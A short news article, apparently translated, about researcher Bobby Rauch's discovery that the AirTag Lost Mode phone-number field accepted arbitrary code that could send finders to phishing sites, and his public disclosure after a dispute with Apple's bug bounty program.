Airtag bug can lead finders to phishing sites

Security researcher Bobby Rauch has discovered an embarrassing security flaw in Apple’s Airtag, reports Krebs on Security. The bug means that anyone who finds a lost Airtag can be tricked into visiting a phishing site.

When the owner places an Airtag in a lost position, Apple’s system generates a unique link on the found.apple.com domain that can display a personal message to the finder and the owner’s phone number if they choose to fill it out.

What Bobby Rauch discovered was that the text field for filling in the telephone number has no restrictions, but it is possible to fill in anything. For example, html and javascript code.

This means that an insidious person can prepare a bunch of Airtag with malicious code and leave in selected places where, for example, a politician or other target may find it.

When Bobby Rauch contacted Apple about the bug at the end of June, he first only received the answer that Apple is investigating the matter. He replied that he would wait 90 days to publish details.

Five days after the deadline, a new email came from Apple confirming the bug and announcing that it will be fixed in an update. He was therefore asked to keep quiet about it for another time. He replied that he could do so if he received more information about when it will be fixed and whether he will receive a dividend from Apple’s bugger program.

The answer was only that Apple hopes that he will not reveal anything, and Bobby Rauch says that he has therefore in protest revealed the bug in public.

Bobby Rauch is not the first security researcher to criticize Apple’s bugger program recently. Last week, Denis Tokarev wrote a blog post about his negative experience of reporting bugs to Apple.